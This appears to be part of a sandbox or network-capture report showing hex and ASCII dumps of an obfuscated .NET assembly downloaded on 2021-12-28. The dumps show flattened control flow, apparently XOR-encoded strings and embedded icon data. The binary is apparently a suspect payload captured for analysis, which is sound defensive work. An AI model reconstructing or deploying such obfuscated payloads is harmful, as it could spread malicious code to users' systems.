                                                                                                                                                        2021-12-28 02:24:04 UTC1848INData Raw: 00 00 00 59 9a 74 0e 00 00 01 fe 0c 0d 00 fe 0c 11 00 20 02 00 00 00 59 9a 74 0b 00 00 01 fe 0c 0d 00 fe 0c 11 00 20 01 00 00 00 59 9a 74 04 00 00 1b 7e 08 00 00 04 fe 0c 08 00 fe 0c 03 00 58 4a 97 29 17 00 00 11 a2 fe 0c 11 00 20 02 00 00 00 59 fe 0e 11 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 85 f5 ff ff fe 0c 10 00 fe 0c 11 00 20 05 00 00 00 9c fe 0c 0d 00 fe 0c 11 00 7e 08 00 00 04 fe 0c 08 00 fe 0c 03 00 58 4a 97 29 18 00 00 11 a2 fe 0c 11 00 20 01 00 00 00 58 fe 0e 11 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 38 f5 ff ff fe 0c 0d 00 fe 0c 11 00 20 01 00 00 00 59 fe 0c 05 00 fe 0c 11 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 8d 02 00 00 01 a2 fe 0c 10 00 fe 0c 11 00 20 01 00 00 00 59 20 05 00 00 00 9c 38 f6 f4 ff ff fe 0c 10 00 fe 0c 11
                                                                                                                                                        Data Ascii: Yt Yt Yt~XJ) Y X8 ~XJ) X X88 Y YJ Y 8
                                                                                                                                                        2021-12-28 02:24:04 UTC1864INData Raw: 1c 00 20 08 00 00 00 58 fe 0e 1c 00 dd a2 f0 ff ff fe 0c 2b 00 fe 0c 22 00 20 02 00 00 00 59 9a 74 07 00 00 1b fe 0c 2b 00 fe 0c 22 00 20 01 00 00 00 59 9a 74 08 00 00 1b 7e 0d 00 00 04 fe 0c 1c 00 fe 0c 14 00 58 4a 97 29 27 00 00 11 fe 0c 22 00 20 02 00 00 00 59 fe 0e 22 00 fe 0c 1c 00 20 08 00 00 00 58 fe 0e 1c 00 dd 44 f0 ff ff fe 0c 0d 00 fe 0c 22 00 8f 04 00 00 01 e0 7e 0d 00 00 04 fe 0c 1c 00 fe 0c 14 00 58 4a 97 29 0c 00 00 11 54 fe 0c 28 00 fe 0c 22 00 20 00 00 00 00 9c fe 0c 22 00 20 01 00 00 00 58 fe 0e 22 00 fe 0c 1c 00 20 08 00 00 00 58 fe 0e 1c 00 dd f1 ef ff ff fe 0c 0d 00 fe 0c 22 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 1c 00 fe 0c 14 00 58 4a fe 0c 1c 00 20 08 00 00 00 58 fe 0c 14 00 58 4a 59 5a fe 0c 1c 00 20
                                                                                                                                                        Data Ascii: X+" Yt+" Yt~XJ)'" Y" XD"~XJ)T(" " X" X" YJ XJ XXJYZ
                                                                                                                                                        2021-12-28 02:24:04 UTC1865INData Raw: 00 00 01 e0 4a fe 0c 13 00 fe 0c 10 00 fe 0c 0e 00 7e 0d 00 00 04 fe 0c 23 00 fe 0c 22 00 20 01 00 00 00 59 94 97 29 29 00 00 11 7e 0d 00 00 04 fe 0c 1c 00 fe 0c 14 00 58 4a 97 29 2a 00 00 11 54 fe 0c 1c 00 20 08 00 00 00 58 fe 0e 1c 00 dd 5f ec ff ff fe 0c 0d 00 fe 0c 22 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 20 ff ff ff ff 58 20 ff ff ff ff 5a fe 0c 1c 00 fe 0c 14 00 58 4a fe 0c 1c 00 20 08 00 00 00 58 fe 0c 14 00 58 4a 59 5a fe 0c 1c 00 20 08 00 00 00 58 fe 0c 14 00 58 4a 58 fe 0c 12 00 58 fe 0e 1c 00 fe 0c 22 00 20 01 00 00 00 59 fe 0e 22 00 dd ee eb ff ff fe 0c 28 00 fe 0c 22 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 2b 00 fe 0c 22 00 20 01 00 00 00 59 fe 0c 2b 00 fe 0c 22 00 20 01 00 00 00 59 9a fe 0c 0d 00 fe 0c 22 00 20
                                                                                                                                                        Data Ascii: J~#" Y))~XJ)*T X_" YJ X ZXJ XXJYZ XXJXX" Y"(" Y +" Y+" Y"
                                                                                                                                                        2021-12-28 02:24:04 UTC1881INData Raw: fe 0c 07 00 3d 05 00 00 00 38 14 05 00 00 20 01 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 ab 04 00 00 38 8d 04 00 00 38 88 04 00 00 20 03 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 03 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 12 05 00 00 38 62 04 00 00 38 5d 04 00 00 20 06 00 00 00 fe 0c 07 00 3f 3e 00 00 00 20 06 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 ec 05 00 00 20 05 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 05 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 3a 05 00 00 38 16 04 00 00 38 11 04 00 00 20 07 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 07 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 a6 05 00 00 38 eb 03 00 00 20 08 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 08 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 d2 05 00 00 38 c5 03 00 00 38 c0 03
                                                                                                                                                        Data Ascii: =8 ? =888 ? =88b8] ?> =8 ? =8:88 ? =88 ? =888
                                                                                                                                                        2021-12-28 02:24:04 UTC1882INData Raw: 07 00 3f 18 00 00 00 20 1e 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 d4 0a 00 00 38 a2 00 00 00 38 9d 00 00 00 20 21 00 00 00 fe 0c 07 00 3f 3e 00 00 00 20 21 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 b3 0b 00 00 20 20 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 20 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 4f 0b 00 00 38 56 00 00 00 38 51 00 00 00 20 22 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 22 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 ab 0b 00 00 38 2b 00 00 00 20 23 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 23 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 0b 00 00 00 38 05 00 00 00 38 00 00 00 00 00 fe 0c 08 00 fe 0c 15 00 fe 0c 12 00 58 4a 58 fe 0e 15 00 38 67 fa ff ff fe 0c 17 00 fe 0c 10 00 8f 04 00 00 01 e0 fe 0c 15 00 fe 0c 12 00 58 4a 54 fe 0c 04 00 fe 0c 10 00 20 00 00 00
                                                                                                                                                        Data Ascii: ? =888 !?> !=8 ? =8O8V8Q "? "=88+ #? #=888XJX8gXJT
                                                                                                                                                        2021-12-28 02:24:04 UTC1898INData Raw: 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 01 54 fe 0c 15 00 fe 0c 14 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 38 40 f1 ff ff fe 0c 06 00 fe 0c 14 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 08 00 fe 0c 14 00 20 01 00 00 00 59 9a 74 0b 00 00 01 7e 13 00 00 04 fe 0c 10 00 fe 0c 03 00 58 4a 97 29 37 00 00 11 fe 0c 14 00 20 02 00 00 00 59 fe 0e 14 00 fe 0c 10 00 20 08 00 00 00 58 fe 0e 10 00 38 e1 f0 ff ff 00 fe 0c 06 00 fe 0c 14 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 2a 00 00 00 13 30 05 00 89 02 00 00 40 00 00 11 fe 0d 0d 00 25 20 01 00 00 00 54 46 fe 0e 00 00 fe 0c 00 00 20 04 00 00 00 5a fe 0e 02 00 fe 0c 00 00 20 08 00 00 00 5a fe 0e 04 00 20 02 00 00 00 8d 01 00 00 01 fe 0e 07 00 20 02 00 00 00 8d 02 00 00
                                                                                                                                                        Data Ascii: YJT Y Y8@ YJ Yt~XJ)7 Y X8 YJ*0@% TF Z Z
                                                                                                                                                        2021-12-28 02:24:04 UTC1899INData Raw: fe 0e 0a 00 fe 0c 01 00 20 01 00 00 00 3f 5f 00 00 00 fe 0c 01 00 20 02 00 00 00 3d 51 00 00 00 20 01 00 00 00 fe 0c 01 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 31 00 00 00 38 2b 00 00 00 20 02 00 00 00 fe 0c 01 00 3f 18 00 00 00 20 02 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 58 00 00 00 38 05 00 00 00 38 00 00 00 00 00 fe 0c 0e 00 fe 0c 06 00 7e 15 00 00 04 fe 0c 0a 00 fe 0c 02 00 58 4a 97 29 41 00 00 11 a2 fe 0c 07 00 fe 0c 06 00 20 05 00 00 00 9c fe 0c 06 00 20 01 00 00 00 58 fe 0e 06 00 fe 0c 0a 00 20 08 00 00 00 58 fe 0e 0a 00 38 18 ff ff ff fe 0c 0a 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 e1 00 00 00 59 20 01 00 00 00 fe 0e 05 00 5a 58 fe 0e 0a 00 38 e9 fe ff ff 00 fe 0c 0e 00 fe 0c 06 00 20 01 00 00 00 59 9a 2a
                                                                                                                                                        Data Ascii: ?_ =Q ? =818+ ? =8X88~XJ)A X X8((%~a Y ZX8 Y*
                                                                                                                                                        2021-12-28 02:24:04 UTC1915INData Raw: 20 00 00 00 00 9c fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 fe 0c 0f 00 20 08 00 00 00 58 fe 0e 0f 00 38 d3 fb ff ff fe 0c 01 00 fe 0c 09 00 8f 04 00 00 01 e0 7e 24 00 00 04 fe 0c 0f 00 fe 0c 00 00 58 4a 97 29 0c 00 00 11 54 fe 0c 0c 00 fe 0c 09 00 20 00 00 00 00 9c fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 fe 0c 0f 00 20 08 00 00 00 58 fe 0e 0f 00 38 80 fb ff ff fe 0c 01 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 0f 00 fe 0c 00 00 58 4a fe 0c 0f 00 20 08 00 00 00 58 fe 0c 00 00 58 4a 59 5a fe 0c 0f 00 20 08 00 00 00 58 fe 0c 00 00 58 4a 58 fe 0c 04 00 58 fe 0e 0f 00 fe 0c 09 00 20 01 00 00 00 59 fe 0e 09 00 38 1b fb ff ff fe 0c 09 00 20 01 00 00 00 59 fe 0e 09 00 38 08 fb ff ff fe 0c 11 00 fe 0c 09 00 20 03 00 00 00
                                                                                                                                                        Data Ascii: X X8~$XJ)T X X8 YJ XJ XXJYZ XXJXX Y8 Y8
                                                                                                                                                        2021-12-28 02:24:04 UTC1916INData Raw: fe 0c 07 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 d5 02 00 00 20 01 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 6c 02 00 00 38 4e 02 00 00 38 49 02 00 00 20 03 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 03 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 d3 02 00 00 38 23 02 00 00 20 04 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 c5 02 00 00 38 fd 01 00 00 38 f8 01 00 00 20 07 00 00 00 fe 0c 07 00 3f 3e 00 00 00 20 07 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 8d 03 00 00 20 06 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 06 00 00 00 fe 0c 07 00 3d 05 00 00 00 38 66 03 00 00 38 b1 01 00 00 38 ac 01 00 00 20 08 00 00 00 fe 0c 07 00 3f 18 00 00 00 20 08 00 00 00 fe 0c 07 00 3d 05 00 00
                                                                                                                                                        Data Ascii: ?> =8 ? =8l8N8I ? =88# ? =888 ?> =8 ? =8f88 ? =
                                                                                                                                                        2021-12-28 02:24:04 UTC1932INData Raw: fe 06 cb 00 00 06 9b 2a 4a fe 09 00 00 fe 09 01 00 fe 09 02 00 28 c1 00 00 06 2a 1a 7e 7e 00 00 04 2a 4a fe 09 00 00 fe 09 01 00 fe 09 02 00 28 0b 00 00 2b 2a 00 00 00 13 30 03 00 54 00 00 00 00 00 00 00 20 04 00 00 00 8d 06 00 00 01 80 24 00 00 04 7e 24 00 00 04 20 00 00 00 00 fe 06 cd 00 00 06 9b 7e 24 00 00 04 20 01 00 00 00 fe 06 ce 00 00 06 9b 7e 24 00 00 04 20 02 00 00 00 fe 06 cf 00 00 06 9b 7e 24 00 00 04 20 03 00 00 00 fe 06 d0 00 00 06 9b 2a 1a 73 3e 00 00 0a 2a 1a 7e 50 00 00 04 2a 00 00 13 30 03 00 43 00 00 00 00 00 00 00 20 03 00 00 00 8d 06 00 00 01 80 25 00 00 04 7e 25 00 00 04 20 00 00 00 00 fe 06 d2 00 00 06 9b 7e 25 00 00 04 20 01 00 00 00 fe 06 d3 00 00 06 9b 7e 25 00 00 04 20 02 00 00 00 fe 06 d4 00 00 06 9b 2a 1a 7e 61 00 00 04 2a 2a
                                                                                                                                                        Data Ascii: *J(*~~*J(+*0T $~$ ~$ ~$ ~$ *s>*~P*0C %~% ~% ~% *~a**
                                                                                                                                                        2021-12-28 02:24:04 UTC1933INData Raw: 00 46 fe 0e 00 00 fe 0c 03 00 20 01 00 00 00 58 fe 0e 03 00 fe 0c 00 00 20 01 00 00 00 3f d1 00 00 00 fe 0c 00 00 20 05 00 00 00 3d c3 00 00 00 20 03 00 00 00 fe 0c 00 00 3f 64 00 00 00 20 03 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 34 01 00 00 20 01 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 82 00 00 00 38 7c 00 00 00 20 02 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 02 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 a3 00 00 00 38 56 00 00 00 38 51 00 00 00 20 04 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 da 00 00 00 38 2b 00 00 00 20 05 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 05 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 ba 00 00 00 38 05 00 00 00 38 00 00 00 00 00 fe 0c 02 00 fe 0c 06 00 fe 0c 09
                                                                                                                                                        Data Ascii: F X ? = ?d =84 ? =88| ? =88V8Q ? =88+ ? =888
                                                                                                                                                        2021-12-28 02:24:04 UTC1949INData Raw: 3d 05 00 00 00 38 b2 19 00 00 20 6d 00 00 00 fe 0c 0f 00 3f 18 00 00 00 20 6d 00 00 00 fe 0c 0f 00 3d 05 00 00 00 38 64 19 00 00 38 32 03 00 00 38 2d 03 00 00 20 6f 00 00 00 fe 0c 0f 00 3f 18 00 00 00 20 6f 00 00 00 fe 0c 0f 00 3d 05 00 00 00 38 93 19 00 00 38 07 03 00 00 38 02 03 00 00 20 72 00 00 00 fe 0c 0f 00 3f 3e 00 00 00 20 72 00 00 00 fe 0c 0f 00 3d 05 00 00 00 38 ef 19 00 00 20 71 00 00 00 fe 0c 0f 00 3f 18 00 00 00 20 71 00 00 00 fe 0c 0f 00 3d 05 00 00 00 38 a1 19 00 00 38 bb 02 00 00 38 b6 02 00 00 20 73 00 00 00 fe 0c 0f 00 3f 18 00 00 00 20 73 00 00 00 fe 0c 0f 00 3d 05 00 00 00 38 d0 19 00 00 38 90 02 00 00 20 74 00 00 00 fe 0c 0f 00 3f 18 00 00 00 20 74 00 00 00 fe 0c 0f 00 3d 05 00 00 00 38 d7 19 00 00 38 6a 02 00 00 38 65 02 00 00 20 7d
                                                                                                                                                        Data Ascii: =8 m? m=8d828- o? o=888 r?> r=8 q? q=888 s? s=88 t? t=88j8e }
                                                                                                                                                        2021-12-28 02:24:04 UTC1950INData Raw: 00 00 00 59 fe 0e 0c 00 38 49 eb ff ff fe 0c 03 00 fe 0c 07 00 fe 0c 00 00 58 4a 58 fe 0e 07 00 38 31 eb ff ff fe 0c 04 00 fe 0c 0c 00 20 00 00 00 00 9c fe 0c 10 00 fe 0c 0c 00 8f 04 00 00 01 e0 fe 0c 0e 00 fe 0c 07 00 fe 0c 00 00 58 4a 8f 03 00 00 01 4a 54 fe 0c 05 00 fe 0c 0c 00 14 a2 fe 0c 0c 00 20 01 00 00 00 58 fe 0e 0c 00 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 38 d5 ea ff ff fe 0c 03 00 fe 0c 07 00 fe 0c 10 00 fe 0c 0c 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 10 00 fe 0c 0c 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 07 00 fe 0c 00 00 58 4a 59 fe 0c 10 00 fe 0c 0c 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 07 00 fe 0c 00 00 58 4a 20 01 00 00 00 59 fe 03 5a 59 20 01 00 00 00 58 20 08 00 00 00 5a 58 fe 0c 00 00 58 4a 58 fe 0e 07 00
                                                                                                                                                        Data Ascii: Y8IXJX81 XJJT X X8 YJ YJXJY YJXJ YZY X ZXXJX
                                                                                                                                                        2021-12-28 02:24:04 UTC1966INData Raw: b0 b0 23 00 00 00 0b 0b 00 00 00 24 00 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 00 25 00 00 00 0c 0c 00 00 00 17 00 00 01 74 74 01 00 00 00 00 03 26 26 03 00 00 0d 07 00 00 00 01 01 00 00 00 01 00 00 01 74 74 01 00 00 26 00 00 03 c5 c5 03 00 00 26 00 00 04 ab ab 04 00 00 15 00 00 00 03 03 00 00 00 00 00 00 05 05 00 00 00 27 28 00 00 00 0d 0d 00 00 00 01 00 00 03 6f 6f 03 00 00 03 29 03 0f 00 00 00 01 01 00 00 00 07 00 00 00 01 01 00 00 00 2a 12 00 00 00 01 01 00 00 00 01 00 00 04 07 07 04 00 00 03 2b 00 00 00 0e 0e 00 00 00 2c 00 00 00 0f 0f 00 00 00 2d 00 00 00 10 10 00 00 00 2e 00 00 00 00 00 00 00 00 01 00 00 01 4f 4f 01 00 00 2f 00 00 00 05 05 00 00 00 30 03 07 00 00 00 00 00 00 00 00 31 00 00 00 11 11 00 00 00 07 00 00 00 64 64 00 00 00 32 00 00
                                                                                                                                                        Data Ascii: #$%tt&&tt&&'(oo)*+,-.OO/01dd2
                                                                                                                                                        2021-12-28 02:24:04 UTC1967INData Raw: 20 42 20 45 20 00 20 41 20 4e 20 00 20 4e 20 41 20 54 20 55 20 52 20 41 20 4c 20 00 20 4e 20 55 20 4d 20 42 20 45 20 52 20 20 20 10 00 00 00 01 01 00 00 00 01 00 00 00 02 02 00 00 00 02 00 00 00 03 03 00 00 00 03 00 00 00 1b 1b 00 00 00 11 00 00 00 01 01 00 00 00 0a 00 00 00 02 02 00 00 00 01 00 00 00 00 00 00 00 00 12 00 00 00 02 02 00 00 00 13 00 00 00 24 24 00 00 00 00 00 01 d4 d4 01 00 00 14 01 00 00 00 00 00 00 00 00 03 00 00 00 24 24 00 00 00 0b 0c 00 00 00 01 01 00 00 00 0c 00 00 00 00 00 00 00 00 08 01 00 00 00 00 00 00 00 00 15 0f 47 00 00 00 00 00 00 4a 4a 00 00 00 25 47 2e 47 33 47 02 47 29 47 23 47 67 47 2a 47 32 47 34 47 33 47 67 47 25 47 22 47 67 47 20 47 35 47 22 47 26 47 33 47 22 47 35 47 67 47 33 47 2f 47 26 47 29 47 67 47 25 47 2e 47 33
                                                                                                                                                        Data Ascii: B E A N N A T U R A L N U M B E R $$$$GJJ%G.G3GG)G#GgG*G2G4G3GgG%G"GgG G5G"G&G3G"G5GgG3G/G&G)GgG%G.G3
                                                                                                                                                        2021-12-28 02:24:04 UTC1983INData Raw: 15 15 1c 00 00 16 01 00 00 00 03 03 00 00 00 03 00 00 00 24 24 00 00 00 01 b9 19 0b a6 a6 0b 19 b9 01 84 62 f1 da da f1 62 84 0d 01 60 02 a9 48 48 a9 02 60 09 01 dd 79 54 38 38 54 79 dd 07 83 01 00 00 00 13 13 00 00 00 14 00 00 00 00 00 00 00 00 15 00 00 00 24 24 00 00 00 00 00 1c 73 73 1c 00 00 16 01 00 00 00 46 46 00 00 00 03 00 00 00 24 24 00 00 00 01 66 a0 73 b3 b3 73 a0 66 0a 01 80 2f e8 75 75 e8 2f 80 07 84 03 00 00 1c 28 28 1c 00 00 01 02 00 00 00 00 00 00 00 00 03 01 00 00 00 00 00 00 00 00 02 03 04 01 00 00 00 00 00 00 00 00 02 00 00 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 2c 25 00 00 23 7e 00 00 98 25 00 00 f4 4c 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 8c 72 00 00 34 00 00
                                                                                                                                                        Data Ascii: $$bb`HH`yT88Ty$$ssFF$$fssf/uu/((BSJBv4.0.30319l,%#~%L#Stringsr4
                                                                                                                                                        2021-12-28 02:24:04 UTC1984INData Raw: d6 40 00 00 d9 00 bb 00 26 01 11 01 00 00 5b 47 00 00 d9 00 bc 00 26 01 11 01 00 00 5f 0c 00 00 d9 00 bd 00 26 01 11 01 00 00 87 37 00 00 d9 00 be 00 26 01 11 01 00 00 9c 21 00 00 d9 00 bf 00 26 01 11 01 00 00 87 35 00 00 d9 00 c0 00 26 01 11 01 00 00 2c 31 00 00 d9 00 c1 00 26 01 11 01 00 00 3d 2d 00 00 d9 00 c2 00 26 01 11 01 00 00 3b 28 00 00 d9 00 c3 00 26 01 11 01 00 00 e5 46 00 00 d9 00 c4 00 26 01 11 01 00 00 7a 1d 00 00 d9 00 c5 00 26 01 11 01 00 00 c6 2e 00 00 d9 00 c6 00 26 01 11 01 00 00 a9 27 00 00 d9 00 c7 00 26 01 11 01 00 00 26 1f 00 00 d9 00 c8 00 26 01 11 01 00 00 f0 32 00 00 d9 00 c9 00 26 01 11 01 00 00 61 1e 00 00 d9 00 ca 00 26 01 11 01 00 00 83 28 00 00 d9 00 cb 00 26 01 11 01 00 00 60 11 00 00 d9 00 cc 00 26 01 11 01 00 00 81 18 00
                                                                                                                                                        Data Ascii: @&[G&_&7&!&5&,1&=-&;(&F&z&.&'&&&2&a&(&`&
                                                                                                                                                        2021-12-28 02:24:04 UTC2000INData Raw: 74 75 72 65 49 6e 66 6f 73 65 74 41 73 73 65 6d 62 6c 79 4e 61 6d 65 00 47 65 74 48 52 46 6f 72 4c 61 73 74 57 69 6e 45 72 72 6f 72 53 65 63 75 72 69 74 79 52 75 6e 74 69 6d 65 00 57 61 69 74 4f 6e 65 00 57 72 69 74 65 4c 69 6e 65 00 47 65 74 4d 61 78 42 79 74 65 43 6f 75 6e 74 67 65 74 49 73 41 70 70 45 61 72 6c 69 65 72 54 68 61 6e 57 69 6e 64 6f 77 73 50 68 6f 6e 65 00 47 65 74 43 68 61 72 43 6f 75 6e 74 47 65 74 55 6e 6d 61 6e 61 67 65 64 54 79 70 65 00 41 63 74 69 76 69 74 79 49 64 45 78 70 6f 72 74 65 64 54 79 70 65 00 45 76 65 6e 74 42 75 69 6c 64 65 72 67 65 74 4f 70 65 72 61 6e 64 54 79 70 65 00 4f 62 6a 65 63 74 43 6c 6f 6e 65 48 65 6c 70 65 72 67 65 74 4f 70 65 72 61 6e 64 54 79 70 65 00 50 72 69 6d 61 72 79 49 64 65 6e 74 69 74 79 53 65 6c 65
                                                                                                                                                        Data Ascii: tureInfosetAssemblyNameGetHRForLastWinErrorSecurityRuntimeWaitOneWriteLineGetMaxByteCountgetIsAppEarlierThanWindowsPhoneGetCharCountGetUnmanagedTypeActivityIdExportedTypeEventBuildergetOperandTypeObjectCloneHelpergetOperandTypePrimaryIdentitySele
                                                                                                                                                        2021-12-28 02:24:04 UTC2001INData Raw: 68 72 65 61 64 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 65 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 47 65 6e 65 72 61 74 65 64 43 6f 64 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 65 72 4e 6f 6e 55 73 65 72 43 6f 64 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 49 53 75 72 72 6f 67 61 74 65 53 65 6c 65 63 74 6f 72 42 65 73 74 46 69 74 4d 61 70 70 69 6e 67 41 74 74 72 69 62 75 74 65 00 67 65 74 52 65 6d 6f 74 69 6e 67 43 6f 6e 66 69 67
                                                                                                                                                        Data Ascii: hreadAttributeCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeISurrogateSelectorBestFitMappingAttributegetRemotingConfig
                                                                                                                                                        2021-12-28 02:24:04 UTC2017INData Raw: d3 6a 15 ff dc 73 1f ff e4 7c 29 ff db 90 54 ff f4 90 40 ff f7 90 3e ff f9 92 40 ff fb 93 42 ff bf 81 50 d3 36 35 36 0b ff ff ff 01 ff ff ff 01 66 67 68 1b d7 9b 6b ff c7 64 15 ff ce 64 0e ff d7 6e 19 ff e1 78 24 ff ea 82 2f ff f2 8b 38 ff e6 96 56 ff dd 93 59 ef db 90 56 d1 bc 84 59 95 66 65 65 15 ff ff ff 01 ff ff ff 01 ff ff ff 01 67 69 6a 1f d3 98 69 ff de d0 c5 ff df c9 b7 ff e2 b8 97 ff e8 ab 7a ff ee 9f 5e ff f6 94 45 ff fc 96 43 ff d5 8b 50 a9 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 69 69 69 23 de de de ff df df df ff a1 a1 a1 ff 9b 9b 9b ff b2 b2 b2 ff cb cb cb ff e0 df de ff ef e0 d3 ff d1 bc aa a5 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 68 68 68 27 e2 e2 e2 ff ce ce ce ff ca ca ca
                                                                                                                                                        Data Ascii: js|)T@>@BP656fghkddnx$/8VYVYfeegijiz^ECPiii#hhh'
                                                                                                                                                        2021-12-28 02:24:04 UTC2018INData Raw: ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 6e 6e 6e 4f 96 62 39 fb c2 57 01 ff c2 57 02 ff c4 63 15 ff c5 68 1e ff c5 5a 04 ff c5 5b 06 ff c7 6c 23 ff c8 68 1b ff ac 93 7f f5 30 30 30 69 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 00 00 00 0b 00 00 00 19 00 00 00 07 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 75 75 75 0f 89 65 49 e9 c4 59 03 ff c7 77 38 ff cb 9d 78 ff cb 95 6a ff c9 74 31 ff cb 95 69 ff cd a4 83 ff cc 85 4c ff cb 61 0b ff cc 66 14 ff a2 89 75
                                                                                                                                                        Data Ascii: nnnOb9WWchZ[l#h000iuuueIYw8xjt1iLafu
                                                                                                                                                        2021-12-28 02:24:04 UTC2034INData Raw: ff ff ff 01 ff ff ff 01 00 00 00 03 00 00 00 15 00 00 00 4d 31 31 31 ab 7d 7d 7d f9 ac ac ac ff 98 98 98 fd 6a 6a 6a ed 47 47 47 d7 2b 2b 2b b9 06 06 06 95 00 00 00 77 00 00 00 59 00 00 00 3b 00 00 00 23 00 00 00 11 00 00 00 07 00 00 00 03 ff ff ff 01 7a 7a 7a 0f 6d 6c 6d f7 bc 5d 10 ff cd af 96 ff cd a2 80 ff ca 74 30 ff c9 5d 07 ff ca 6e 24 ff cc 98 6f ff cf c3 ba ff cf c1 b6 ff ce 99 6f ff cc 71 27 ff cc 61 0c ff cd 62 0e ff cd 63 0e ff ce 64 0f ff cf 65 0f ff cf 65 10 ff cf 66 11 ff d0 66 11 ff d1 67 12 ff d1 68 13 ff d2 68 13 ff d3 69 14 ff d3 69 15 ff b0 94 7f ff 55 55 55 e1 00 00 00 49 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff
                                                                                                                                                        Data Ascii: M111}}}jjjGGG+++wY;#zzzmlm]t0]n$ooq'abcdeeffghhiiUUUI
